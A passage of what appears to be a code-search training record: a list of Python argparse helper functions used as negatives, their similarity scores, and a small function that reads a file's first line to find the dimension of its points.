that is used when blurring (default = 5.0 mm)\")\n parser.add_argument(\"-c\", \"--cores\", action=\"store\", default=cpu_count(), type=int, metavar=\"C\",\n help=\"number of cores supplied to 3dDeconvolve (default = all cores)\")\n parser.add_argument(\"-s\", \"--subj_id\", action=\"store\", default=\"sub\", metavar=\"SUB\",\n help=\"text file of subject ids (default = sub)\")\n parser.add_argument(\"-T\", \"--time_step\", action=\"store\", default=0, type=float, metavar=\"TS\",\n help=\"set the time step for bandpassing (default = ts in header info\")\n\n parser.add_argument(\"-g\", \"--global_signal_regression\", action=\"store_false\", default=True,\n help=\"do not perform global signal regression (default = perform gsr)\")\n\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", default=False,\n help=\"\"\"rerun preprocessing, override and delete previous results in \n 'Processed' folder (default = don't override)\"\"\")\n parser.add_argument(\"-m\", \"--motion_param\", action=\"store_true\", default=False,\n help=\"use 12 motion parameters for regression (default = 6 motion parameters)\")\n parser.add_argument(\"-G\", \"--gm_blur\", action=\"store_true\", default=False,\n help=\"blur only in grey matter mask (default = blur in whole brain)\")\n parser.add_argument(\"-n\", \"--nl_reg\", action=\"store_true\", default=False,\n help=\"use non-linear warp between anatomical and MNI template (default = linear warp)\")\n\n # Required Inputs\n required = parser.add_argument_group(\"required arguments\")\n required.add_argument(\"-e\", \"--epi\", action=\"store\", required=True,\n help=\"text file of paths to raw epi data\")\n required.add_argument(\"-a\", \"--anat\", action=\"store\", required=True,\n help=\"text file of paths to raw anatomical data\")\n required.add_argument(\"-o\", \"--out_dir\", action=\"store\", required=True, metavar=\"OUT\",\n help=\"text file of paths to output directory\")\n result = parser.parse_args(args)\n\n # Make sure inputted parameters are legal\n assert (os.path.isfile(result.epi)), \"{} does not exist or is not a file\".format(result.epi)\n assert (os.path.isfile(result.anat)), \"{} does not exist or is not a file\".format(result.ant)\n assert (result.trs_remove >= 0), \"Cannot remove negative trs\"\n assert (result.dim_voxel >= 0), \"Cannot have a negative voxel dimension\"\n assert (np.all(np.array(result.bandpass) > 0)), \"Cannot have a negative frequency limit for bandpassing\"\n assert (result.volumes > -1), \"Number of volumes must be greater than 0\"\n assert (result.cores > 0), \"Number of cores used must be greater than 0\"\n assert (result.time_step > -1), \"Time step must be greater than 0\"\n\n return result", "def _parseArgs():\n # HINT: If you consider adding an option,\n # please consider adding a config file option first.\n parser = ArgumentParser(description=STRING_USAGE_DESCRIPTION,\n epilog=STRING_USAGE_EPILOG)\n parser.add_argument('--version', action='version',\n version='%(prog)s (' + VERSIONSTRING + ')')\n parser.add_argument('-c', '--configfile', action='store',\n dest='configfile',\n default=DEFAULT_CONFIGFILE,\n help=STRING_USAGE_CONFIGFILE)\n parser.add_argument('-e', '--editconfig', action='store_true',\n dest='invoke_editconfig',\n default=False,\n help=STRING_USAGE_EDITCONFIG)\n parser.add_argument('--defaultconfig', action='store_true',\n dest='invoke_defaultconfig',\n default=False,\n help=STRING_USAGE_DEFAULTCONFIG)\n parser.add_argument('--printconfig', action='store_true',\n dest='invoke_printconfig',\n 
default=False,\n help=STRING_USAGE_PRINTCONFIG)\n _addOverwriteBool(parser, 'gui', 'gui', 'enable')\n parser.add_argument('-s', '--sources', section='wesen',\n dest='sources',\n action=_OverwriteConfigAction)\n parser.add_argument('-r', '--resume',\n dest='resume', action='store_true',\n default=False, help=STRING_USAGE_RESUME)\n return parser.parse_known_args()", "def parse_arguments():\n #usage = \"usage: %(prog)s [options] <message file>\" + DESCRIPTION\n parser = ArgumentParser()\n parser.add_argument('-v', '--version', action='version', version=VERSION)\n parser.add_argument('source', metavar='source', help='input logfile or directory with logfiles')\n\n \"\"\"\n parser.add_argument('-m', '--mat-id', metavar='string', # or stare_false\n dest=\"id_mat\", default='', # negative store value\n help=\"material id to grep\")\n parser.add_argument('-c', '--count', metavar='N', type=int, # or stare_false\n dest=\"count\", default=0, # negative store value\n help=\"count\")\n parser.add_argument('-p', '--pattern', metavar='string', # or stare_false\n dest=\"pattern\", default='xxx', # negative store value\n help=\"search pattern within logfile\")\n \"\"\"\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Helps analyze articles.')\n parser.add_argument('--config', default='config.yaml',\n help='Configuration file for the options of this script')\n parser.add_argument('--search', default=None, type=str,\n help='Search for text in the articles')\n parser.add_argument('--case-sensitive', action='store_true',\n help='Makes search case-senstive (only applicatble to --search)')\n parser.add_argument('--list', default=None, type=str,\n help='List [title|authors|date|word-count|author|excerpt|content] of the articles')\n parser.add_argument('--sort', action='store_true',\n help='Sorts output (only applicable to --list).')\n parser.add_argument('--sort-by', default=None, type=str,\n help='Sorts output by another attribute [title|author|date] (only applicable to --list)')\n parser.add_argument('--statistics', action='store_true',\n help='Gives basic statistics about the articles.')\n parser.add_argument('--count-articles', action='store_true',\n help='Counts the total number of articles')\n parser.add_argument('--count-words', action='store_true',\n help='Counts the total number of words')\n parser.add_argument('--count-paragraphs', action='store_true',\n help='Counts the total number of paragraphs')\n parser.add_argument('--count-by-author', action='store_true',\n help='Counts the number of articles by each author')\n parser.add_argument('--count-by-year', action='store_true',\n help='Counts the number of articles bucketed by year')\n parser.add_argument('--count-by-months', default=None, type=int,\n help='Counts the number of articles bucketed by number of months')\n \n return parser, parser.parse_args()", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser(\n description=\"Convert dependency files into list of GitHub links.\",\n epilog=\"For help with this program, contact John Speed at jmeyers@iqt.org.\",\n )\n parser.add_argument(\n \"--python\",\n default=False, # default value is False\n help=\"Convert requirements.txt file into GitHub links.\",\n )\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Parse library type information.\")\n parser.add_argument(\"input_file\", help=\"Salmon library type information file.\")\n return parser.parse_args()", "def _parse_args():\n 
parser = argparse.ArgumentParser(description='Pure-python command-line calculator.')\n\n parser.add_argument('EXPRESSION', action=\"store\", type=str, help=\"expression string to evaluate\")\n parser.add_argument('-m', '--use-modules', nargs='+', action=\"store\", dest=\"MODULE\", type=str,\n help=\"additional modules to use\")\n\n return parser.parse_args()", "def parse_args():\n if len(sys.argv) < REQUIRED_NUM_ARGS or len(sys.argv) > MAXIMUM_NUM_ARGS:\n error_quit(\"Incorrect number of arguments!\", 400)\n # Set port to DEFAULT if not specified as an arg. Otherwise, port = portarg.\n port = sys.argv[PORT_ARG_NUM] if len(sys.argv) == MAXIMUM_NUM_ARGS else DEFAULT_FTP_PORT\n port = validate_port(port)\n # Get host address and logfile name from args.\n host, log_file = sys.argv[HOST_ARG_NUM], sys.argv[LOG_ARG_NUM]\n return host, log_file, port", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='For each timestep, gather the energy information output by LAMMPS '\n 'in the log file.')\n parser.add_argument(\"-f\", \"--file\", help=\"The log file to be processed.\",\n default=None)\n parser.add_argument(\"-l\", \"--list_file\", help=\"The a file with a list of log files to be processes.\",\n default=None)\n args = None\n try:\n args = parser.parse_args(argv)\n if args.file is None:\n args.file_list = []\n else:\n if os.path.isfile(args.file):\n args.file_list = [args.file]\n args.source_name = args.file\n else:\n raise IOError(\"Could not find specified log file: {}\".format(args.file))\n if args.list_file is not None:\n args.file_list += file_rows_to_list(args.list_file)\n args.source_name = args.list_file\n if len(args.file_list) < 1:\n raise InvalidDataError(\"Found no log file names to process. 
Specify one or more files as specified in \"\n \"the help documentation ('-h').\")\n except IOError as e:\n warning(\"Problems reading file:\", e)\n parser.print_help()\n return args, IO_ERROR\n except (KeyError, InvalidDataError, SystemExit) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n return args, GOOD_RET", "def parse_arguments():\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"postcode\", type=str, help=\"Postcode of current location\")\n parser.add_argument(\"-d\", \"--debug\", \n help=\"Turns on debug mode\", \n action='store_true')\n parser.add_argument(\"-fp\",\"--postcode-file\", \n default=\"postcodes_swift_sample.csv\",\n help=\"Location of Postcode CSV file (default postcodes_swift_sample.csv)\",\n type=str)\n parser.add_argument(\"-fb\",\"--pub-file\", \n default=\"pubnames_swift_sample.csv\",\n help=\"Location of Pub Postcode CSV file (default pubnames_swift_sample.csv)\",\n type=str)\n parser.add_argument(\"-l\",\"--limit\", \n default=10, \n help=\"Limit Number of Results (default 10)\",\n type=int)\n parser.add_argument(\"-m\",\"--max-distance\", \n default=50, \n help=\"Only return results less than this distance (default 50)\",\n type=int)\n return parser", "def parse_args():\n\n parser = argparse.ArgumentParser(description='CLI to store Actisense-NGT Gateway values to InfluxDB and publish via MQTT')\n parser.add_argument('--config', '-c', type=str, required=True, help='JSON configuraton file with path')\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=\"Note: Plot depth files.\")\n parser.add_argument(\"-d\", \"--depth_dir\", help='depth file directory')\n parser.add_argument(\"-r\", \"--result_dir\", help='output directory')\n parser.add_argument(\"-f\", \"--ref\", help='one depth file as ref')\n parser.add_argument(\"-w\", \"--window_size\", help='sliding window size')\n\n args = parser.parse_args()\n return args", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--thoughtspot_host\", required=True,\n help=\"domain or ip. E.g. http://1.1.1.1\")\n parser.add_argument(\"-u\", \"--username\", required=True,\n help=\"username - must have administrative privileges\")\n parser.add_argument(\"-p\", \"--password\", required=True,\n help=\"password - must have administrative privileges\")\n parser.add_argument(\"-d\", \"--delimiter\", default=',',\n help=\"character to seperate values by. 
Default to comma\")\n parser.add_argument(\"-c\", \"--csv\", action=\"store_true\",\n help=\"create csv file called permissions.csv\")\n parser.add_argument(\"-s\", \"--share\", action=\"store_true\",\n help=\"output usable format for share api\")\n return parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n #parser.add_argument(\"args\", metavar=\"N\", type=str, nargs=\"*\", help=\"Positional arguments.\")\n #parser.add_argument(\"\", dest=\"\", type=\"\", default=, help=)\n #parser.add_argument(\"--version\", action=\"version\", version=\"<the version>\")\n\n return parser.parse_args()", "def _parse_args():\n usage = \"usage: %prog [options] arg1 arg2\"\n parser = optparse.OptionParser()\n parser.add_option(\n '--platform', dest='platform', default=\"\", type = \"string\",\n help='platform name: UC 360 baidu etc.')\n parser.add_option(\n '--workspace', dest='workspace', default=\"./\", type = \"string\",\n help='project directory.')\n parser.add_option(\n '--project', dest='projectDir', default=\"./destProject\", type = \"string\",\n help='project directory.')\n # parser.add_option(\n # \"-t\", dest=\"test\", action=\"store_const\", const=lambda:_test, default=_test2, help=\"////////////\"\n # )\n options, args = parser.parse_args()\n # positional arguments are ignored\n return options, args", "def parse_args():\n parser = MyParser(description='Data processing and analytics library \\\n for OpenStack Browbeat perf data')\n\n parser.add_argument('-s', '--summary', dest=\"days\", type=int, default=-1,\n help='-s N summary of last N days of results')\n\n parser.add_argument('--summary-uuid', dest=\"summary_uuid\", type=str,\n default=None,\n help='--summary-uuid UUID summary of a specific uuid')\n\n parser.add_argument('--short-summary', dest=\"short_days\", type=int,\n default=-1,\n help='--short-summary N gives \\\n summary of last N days of results but uses cockroach \\\n db so only provides with basic summary')\n\n parser.add_argument('--upload-timesummary', dest=\"timeseries_uuid\",\n type=str, default=None,\n help='--upload-timesummary UUID \\\n uploads the features computed from data obtained from\\\n graphite. ')\n\n parser.add_argument('--upload-logsummary', dest=\"loggin_uuid\",\n type=str, default=None,\n help='--upload-logsummary UUID \\\n uploads the log summary to crdb \\\n currently just summarizes over entire timeperiod. ')\n\n parser.add_argument('-u', '--update-db', dest='update', type=bool,\n default=False,\n help='-u True pushes data to cockroach db')\n\n parser.add_argument('--update-clf', dest=\"clf_days\", type=int,\n default=-1,\n help='--update-clf 60 will update all classifiers \\\n listed in config file under classifier_lists \\\n using data from last 60 days')\n\n parser.add_argument('--test-clf', dest=\"test_days\", type=int,\n default=-1,\n help='--test-clf 60 will train all classifiers \\\n listed in config file under classifier_lists \\\n using data from last 60 days and then test it \\\n and display metrics')\n\n parser.add_argument('-v', '--osp-version', dest='version', type=str,\n default=None,\n help='-v 11-tripleo only returns hits for that \\\n OpenStack version, \\\n only supported by summary right now')\n\n parser.add_argument('-c', '--config', dest='config', type=str,\n default=pkg_resources.resource_filename('bml',\n \"config.yml\"),\n help='-c <config file path> use custom config file')\n\n args = parser.parse_args()\n return args" ]
[ "0.807208", "0.74767", "0.73985106", "0.73932225", "0.73173845", "0.72599804", "0.7232453", "0.7222555", "0.713585", "0.7102058", "0.71020466", "0.7096281", "0.7093058", "0.70890576", "0.7080071", "0.70745754", "0.70641047", "0.70633066", "0.70568484", "0.7051162", "0.70484704", "0.70392704", "0.70360875", "0.70318705", "0.7027451", "0.70252234", "0.7022721", "0.7022492", "0.70170593", "0.7014263", "0.70100504", "0.7007431", "0.6994161", "0.699383", "0.6983955", "0.6983752", "0.69775766", "0.69572973", "0.69533485", "0.6947874", "0.6945031", "0.69413644", "0.6922684", "0.69203645", "0.6918339", "0.6913712", "0.69133645", "0.69080514", "0.690557", "0.69051087", "0.68935853", "0.68917054", "0.68904185", "0.6890077", "0.68900126", "0.68862873", "0.68861234", "0.6881948", "0.6877161", "0.68741214", "0.6872096", "0.6868787", "0.6868005", "0.6862433", "0.6861699", "0.68557686", "0.68520546", "0.6849977", "0.68487155", "0.6848432", "0.6847478", "0.6847275", "0.68372065", "0.68345195", "0.68323785", "0.6829461", "0.6828884", "0.6828278", "0.6821114", "0.6820864", "0.68143517", "0.68131423", "0.6812891", "0.681097", "0.6810629", "0.68098515", "0.68074393", "0.6801786", "0.67999804", "0.6798342", "0.6791417", "0.67910695", "0.6789611", "0.67888737", "0.67882013", "0.67845696", "0.6779286", "0.67742145", "0.67737764", "0.6772532", "0.6772439" ]
0.0
-1
Finds the dimension of the points in the file.
def find_dimesion(filename):
    file = open(filename,"r")
    line = file.readline()
    file.close()
    return len(line.split())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_dimensions ( file_in, separator ) :\n try :\n logger.info ( \"Extract dimensions from xyz file \" + str(file_in) ) \n d = {}\n first_row = True\n d[NOPS] = 0\n file = open(file_in, 'r')\n for line in file :\n d[NOPS] = d[NOPS] + 1\n l = line.rstrip().split(separator)\n x = float(l[0])\n y = float(l[1])\n z = float(l[2])\n if first_row :\n d[MINX] = x\n d[MAXX] = x\n d[MINY] = y\n d[MAXY] = y\n d[MINZ] = z\n d[MAXZ] = z\n first_row = False\n else :\n if x < d[MINX] :\n d[MINX] = x\n if x > d[MAXX] :\n d[MAXX] = x \n if y < d[MINY] :\n d[MINY] = y\n if y > d[MAXY] :\n d[MAXY] = y \n if z < d[MINZ] :\n d[MINZ] = z\n if z > d[MAXZ] :\n d[MAXZ] = z \n file.close() \n logger.info ('Now return')\n return d\n except Exception, err:\n logger.critical(\"Extract dimensions from xyz file failed: ERROR: %s\\n\" % str(err))\n raise", "def GetDimensions(filename):\n with Image(filename=filename) as img:\n dimensions = (img.width, img.height)\n return(dimensions)", "def get_num_points(self):\n dimensions = self.data.shape\n return dimensions[0]", "def get_dimension(pts):\n return pts[3][0] - pts[0][0], pts[3][1] -", "def dimensions():", "def InferSpatialDimension(self):\n\n assert self.points is not None\n # if self.points.shape[1] == 3:\n # if self.element_type == \"tri\" or self.element_type == \"quad\":\n # print(\"3D surface mesh of \", self.element_type)\n\n return self.points.shape[1]", "def _get_las_npoints(fpath):\n with laspy.file.File(fpath) as f:\n return f.header.count", "def getDimensions():", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def pointsize(self):\n\treturn self.m_pointsize", "def read_off_size(path):\n try:\n with open(path, 'r') as file:\n lines = file.readlines()\n if lines[0] != 'OFF\\n':\n print(path, 'Error: is not an .off file')\n num_vertices, num_faces = tuple(lines[1].split()[:2])\n return int(num_vertices), int(num_faces)\n except IOError:\n print('Error: Failed reading file:', path)", "def loadSize(filepath):\n \n from osgeo import gdal\n \n ds = gdal.Open(filepath, 0)\n \n return ds.RasterYSize, ds.RasterXSize", "def dims(filespec, verbose=False):\n with open(filespec, \"rb\") as f:\n if f.read(4) == b\"\\x76\\x2f\\x31\\x01\": # EXR magic number\n version = np.frombuffer(f.read(4), dtype=\"<u4\")[0]\n max_strlen = 256 if (version & 0x400) else 32\n got_channels = False\n got_dims = False\n while not (got_channels and got_dims):\n attr_name = _read_string_nul(f, max_strlen)\n _ = _read_string_nul(f, max_strlen) # attr_type\n attr_size = np.frombuffer(f.read(4), dtype=\"<u4\")[0]\n if attr_name == \"channels\":\n nchan = 0\n isfloat = False\n bitdepth = 16\n while not got_channels:\n name = _read_string_nul(f, max_strlen)\n if len(name) >= 1:\n dtype = np.frombuffer(f.read(16), dtype=\"<u4\")[0]\n isfloat = isfloat or (dtype > 0)\n bitdepth = max(bitdepth, 16 if dtype == 1 else 32)\n nchan += 1\n else:\n got_channels = True\n elif attr_name == \"dataWindow\":\n box = np.frombuffer(f.read(16), dtype=\"<i4\")\n xmin, ymin, xmax, ymax = box\n width = xmax - xmin + 1\n height = ymax - ymin + 1\n got_dims = True\n else:\n _ = f.seek(attr_size, 1)\n if verbose:\n print(f\"Reading file {filespec} \", end='')\n print(f\"(w={width}, h={height}, c={nchan}, bitdepth={bitdepth})\")\n return width, height, nchan, isfloat, bitdepth\n raise RuntimeError(f\"File {filespec} is not a valid EXR file.\")", "def dimensions(self) -> typing.Tuple[int, int]:\n dimensions = self.data[2]\n dimensions = 
re.findall(r'(\\d+)\\s+x\\s+(\\d+)\\s+M', dimensions.replace('-', '0'))\n return dimensions[0] if dimensions else (0, 0)", "def getDimension(data):\r\n # open image for reading in binary mode\r\n\r\n # read the 2 bytes\r\n a = data[163:165]\r\n\r\n # calculate height\r\n height = (a[0] << 8) + a[1]\r\n\r\n # next 2 bytes is width\r\n a = data[165:167]\r\n\r\n # calculate width\r\n width = (a[0] << 8) + a[1]\r\n\r\n return (width, height)", "def find_size(mod):\n left = right = top = bottom = 0\n\n for line in (n for n in mod if n[0] == \"fp_line\"):\n layer = [n for n in line if n[0] == \"layer\"][0]\n if layer[1] in (\"F.CrtYd\", \"B.CrtYd\"):\n start = [n for n in line if n[0] == \"start\"][0]\n end = [n for n in line if n[0] == \"end\"][0]\n for x, y in (start[1:], end[1:]):\n x = float(x)\n y = float(y)\n left = min(x, left)\n right = max(x, right)\n top = min(y, top)\n bottom = max(y, bottom)\n\n width = right - left\n height = bottom - top\n\n left -= width * border_ratio\n right += width * border_ratio\n top -= height * border_ratio\n bottom += height * border_ratio\n\n return left, right, top, bottom", "def dimension(self):\n\t\treturn self.d", "def get_dimensions(image_path):\n with Image.open(image_path) as img:\n return img.size", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def get_feature_size_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n return shape[1]", "def get_feature_size_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n return shape[1]", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def get_voxel_size(path: str) -> float:\n dcm = pydicom.dcmread(path, force=True)\n x_str, y_str = dcm.PixelSpacing\n x = Decimal(str(x_str))\n y = Decimal(str(y_str))\n z = Decimal(str(dcm.SpacingBetweenSlices))\n print(float(x * y * z))\n return float(x * y * z)", "def num_dimensions(self):\n if self.__num_dimensions__ == 0:\n # Try to get the number of dimensions from the first point or bounding box\n if len(self.points) > 0:\n self.__num_dimensions__ = len(self.points[0].coordinate)\n elif len(self.bounding_boxes) > 0:\n self.__num_dimensions__ = len(self.bounding_boxes[0].start)\n return self.__num_dimensions__", "def get_dimensions(self):\r\n x = []\r\n y = []\r\n z = []\r\n for i in self.verts:\r\n x.append(i[0])\r\n y.append(i[1])\r\n z.append(i[2])\r\n\r\n x.append(abs(min(x)))\r\n y.append(abs(min(y)))\r\n z.append(abs(min(z)))\r\n\r\n return max(x), max(y), max(z)", "def n_points(self):\n return self.points.shape[0]", "def get_num_dimensions(self):\n dimensions = self.data.shape\n return dimensions[1]", "def __len__(self) -> int:\n import h5py\n\n with h5py.File(\n os.path.join(self.root, self.data_dir, 
self.img_file_name), \"r\"\n ) as f:\n num_datapoints: int = f[self.split][\"pv_log\"].shape[0]\n\n return num_datapoints", "def get_dimensions(self):\n return self.lon_arr.shape", "def dimension(self) -> float:\n return self._dimensions", "def get_dimension_length(self):\n pass", "def dimension_size(self):\n return self._dim", "def N_POINTS(self) -> int:\n try:\n with self.fs.open(\n self.get_url().replace(\".\" + self.erddap.response, \".ncHeader\")\n ) as of:\n ncHeader = of.read().decode(\"utf-8\")\n lines = [line for line in ncHeader.splitlines() if \"row = \" in line][0]\n return int(lines.split(\"=\")[1].split(\";\")[0])\n except Exception:\n pass", "def image_size_from_file(filename):\n with PIL.Image.open(filename) as img:\n width, height = img.size\n return height, width", "def get_image_size(self, **kwargs):\n points = kwargs['points']\n max_val = points.max(0)\n min_val = points.min(0)\n height = np.ceil((max_val[0] - min_val[0]) * self.res_x).astype(int)\n width = np.ceil((max_val[1] - min_val[1]) * self.res_y).astype(int)\n\n return height, width", "def getPointSize(self):\n l = [point.size for point in self.points]\n if l.count(l[0]) == len(l):\n return l[0]\n else:\n raise ValueError(\"The sizes of the points must be the same otherwise it makes no sense.\")", "def xFileInfo(filename):\n delim = getDelimiter(filename)\n f = open(filename, 'r')\n reader = csv.reader(f, delimiter=delim)\n num_rows = 0\n for (row_i, row) in enumerate(reader):\n if row_i == 0: #ignore empty strings (e.g. at end of row)\n num_cols = len([val for val in row if val])\n num_rows += 1\n f.close()\n return (num_rows, num_cols)", "def get_data_dimensions(self):\n return image_utils.convert_shape_indexing(self._get_data_dimensions_rc(),\"rc\",self.image_indexing)", "def data_info(data):\n filename = data[\"filename\"]\n X_var = data[\"X_var\"]\n Y_var = data[\"Y_var\"]\n X,Y = read_file(filename,X_var,Y_var)\n input_dim = len(X_var)\n output_dim = len(Y_var)\n return X,Y,input_dim,output_dim", "def ndim(self):\n return len(self.point)", "def getPDBDimensions(pdbfile):\n\tf = open(pdbfile, \"r\")\n\tlimits = numpy.array([100,100,100,-100,-100,-100], dtype=numpy.float32)\n\tcount = 0\n\tfor line in f:\n\t\t### only look at atom lines\n\t\tif line.startswith(\"ATOM \") or line.startswith(\"HETATM\"):\n\t\t\tcount += 1\n\t\t\tx = float(line[30:38])\n\t\t\ty = float(line[38:46])\n\t\t\tz = float(line[46:54])\n\t\t\t## x limits\n\t\t\tif x < limits[0]:\n\t\t\t\tlimits[0] = x\n\t\t\telif x > limits[3]:\n\t\t\t\tlimits[3] = x\n\t\t\t## y limits\n\t\t\tif y < limits[1]:\n\t\t\t\tlimits[1] = y\n\t\t\telif y > limits[4]:\n\t\t\t\tlimits[4] = y\n\t\t\t## z limits\n\t\t\tif z < limits[2]:\n\t\t\t\tlimits[2] = z\n\t\t\telif z > limits[5]:\n\t\t\t\tlimits[5] = z\n\tf.close()\n\tif count == 0:\n\t\tapDisplay.printError(\"No atoms were found in PDB file\")\n\tapDisplay.printMsg(\"Found %d atoms in PDB file\"%(count))\n\tapDisplay.printMsg(\"x limits: %.2f - %.2f = %.2f\"%(limits[3],limits[0],limits[3]-limits[0]))\n\tapDisplay.printMsg(\"y limits: %.2f - %.2f = %.2f\"%(limits[4],limits[1],limits[4]-limits[1]))\n\tapDisplay.printMsg(\"z limits: %.2f - %.2f = %.2f\"%(limits[5],limits[2],limits[5]-limits[2]))\n\tlimitsize = max(limits[3]-limits[0], limits[4]-limits[1], limits[5]-limits[2])\n\treturn limitsize", "def get_dim(self, name):\n return len(self.root_group.dimensions[name])", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corners())\n corners = 
np.concatenate(corners)[:, :2] / self._pixel_shape\n\n # Find extremes, add 1 px margin to allow for rounding errors\n min_xy = corners.min(axis=0).astype(int) - 1\n max_xy = corners.max(axis=0).astype(int) + 1\n\n size = max_xy - min_xy\n centre = -min_xy\n # Switch xy -> yx\n return tuple(size[::-1]), centre[::-1]", "def getNumDimensions(self):\n return len(self.di.keys())", "def dimension(self):", "def findFLength(filename):\n f = os.popen('wc -l < {}'.format(filename))\n return int(f.read())", "def dimensions(self) -> int:\n return pulumi.get(self, \"dimensions\")", "def n_points(self):\n\n if self.data_reduced:\n return len(self.data_reduced[0])\n else:\n return 0", "def _get_diameter(self,filename,maxLen=3):\n filename = os.path.splitext(filename)[0] \n filename = os.path.split(filename)[1] \n filename = filename.split(\"_\",3)[2] \n diameter = filename \n return diameter", "def nr_points(self):\n return len(self.x)", "def dataDimensions(data):\n logging.info('Number of rows of data: %s' % len(data))\n logging.info('Number of columns of data: %s' % len(data[1]))", "def GetNumberOfPoints(self):\n return self.GetNumberOfElements(ArrayAssociation.POINT)", "def get_dimensions(self):\n x = max(self.bodies, key=lambda p: p.position[0]).position[0]\n y = max(self.bodies, key=lambda p: p.position[1]).position[1]\n return max(x, y) * 1.2", "def dimension(self):\n return self._dim", "def read_image_size(file_name):\n return Image.open(file_name).size", "def getDimensions(self):\n\t\tprint \"Returning\",self.x,self.y,self.slicesPerTimepoint\n\t\treturn (self.x, self.y, self.slicesPerTimepoint)", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corner_idx)\n corners.append(tile.opp_corner_idx)\n corners = np.stack(corners)\n\n # Find extremes\n min_yx = corners.min(axis=0)\n max_yx = corners.max(axis=0)\n\n size = max_yx - min_yx\n centre = -min_yx\n return tuple(size), centre", "def dimension(self) -> int:\n return self.options.dimension", "def num_data_lines(filepath):\n\tif not file_exists(filepath):\n\t\treturn -1\n\tcount = 0\n\twith open(filepath, 'r') as f:\n\t\twhile read_floats(f):\n\t\t\tcount += 1\n\tf.close()\n\treturn count", "def spatial_dimension(self):\r\n pass", "def fill_points_list(filename):\n f = open(input_file_test(filename), \"r\")\n\n dimension = find_dimesion(filename)\n points = list()\n line_count = 1\n flag = False\n for line in f:\n current_point = line.split()\n\n if dimension == len(current_point):\n check_if_number(current_point)\n point = Point(points=current_point, line=line_count)\n points.append(point)\n\n line_count += 1\n else:\n flag=True\n break\n\n if flag:\n print PointError()\n sys.exit()\n\n if len(points) ==1:\n print NotEnoughPointError()\n sys.exit()\n\n f.close()\n\n return points", "def dimension(self):\n return self.__N", "def size(self):\n\t\treturn self.dims", "def get_dimensions(self, variable):\n try:\n var_dimension = self.dataset[variable].dims\n return var_dimension\n except:\n print(\"Error Occurred: No Dimensions detected... Exiting. 
\")\n exit()", "def getDimensions(self):\n return _libsbml.Layout_getDimensions(self)", "def dimension_count(self):\n return self._dimensionCount", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def dimension(self):\n return self._dimension", "def get_size(fname):\n return os.path.getsize(fname)", "def dimension(self):\n return 3*self.genus - 3 + self.n", "def get_lengths(filename, means, stds):\n\n with open(filename, 'rt') as f:\n for line in f:\n \n if line.startswith('Spring EE distance'):\n\n line = next(f)\n means.append(float(line.split()[0]))\n stds.append(float(line.split()[1]))\n break\n\n else:\n raise EOFError('No spring EE distance found')", "def size(path):", "def numpoints(self):\n return len(self.pars) + 1 # so dof is 1", "def GetSize(filename):\n return os.path.getsize(filename)", "def get_size(self):\n lines = len(self.coefficients)\n columns = 0 if lines == 0 else len(self.coefficients[0])\n return lines, columns", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def count_triangles(self, file):\n self.nibble(80)\n return struct.unpack(\"@i\", self.nibble(4))[0]", "def get_files_size_and_line_number(file_path, file_format):\n logging.info(\"[get_file_size_and_line_number] file_path: %s, file_format: %s\", file_path, file_format)\n size = 0\n lines = 0\n for root, dirs, files in os.walk(file_path):\n for file in files:\n for one_format in file_format:\n if file.endswith(one_format):\n size += os.path.getsize(os.path.join(root, file))\n lines += get_file_lines(os.path.join(root, file))\n return size, lines", "def video_dimensions(filename):\n\n probe = ffmpeg.probe(filename)\n\n video_stream = next((stream for stream in probe['streams']\n if stream['codec_type'] == 'video'), None)\n\n width = int(video_stream['width'])\n height = int(video_stream['height'])\n\n return width, height", "def get_size(filename):\n fileinfo = os.stat(filename)\n return fileinfo", "def _get_observation_dimension(self):\n return len(self._get_observation_np())", "def dims(self) -> tuple[str, str]:\n # if self.dim0 is not None:\n return self.y_dim, self.x_dim", "def getDimensions(self):\n return _libsbml.BoundingBox_getDimensions(self)", "def get_dimensions(image, classname):\n start, ext = os.path.splitext(image)\n if ext == '.yuv':\n bitdepth = \"8\"\n res_split = start.split('x')\n width_split = res_split[0].split('_')\n width = width_split[-1]\n height_split = res_split[-1].split('_')\n m = res_split[-1].find(\"bit\")\n if res_split[-1][m - 2] == \"_\":\n depth = res_split[-1][m - 1]\n else:\n depth = res_split[-1][m - 2:m]\n height = 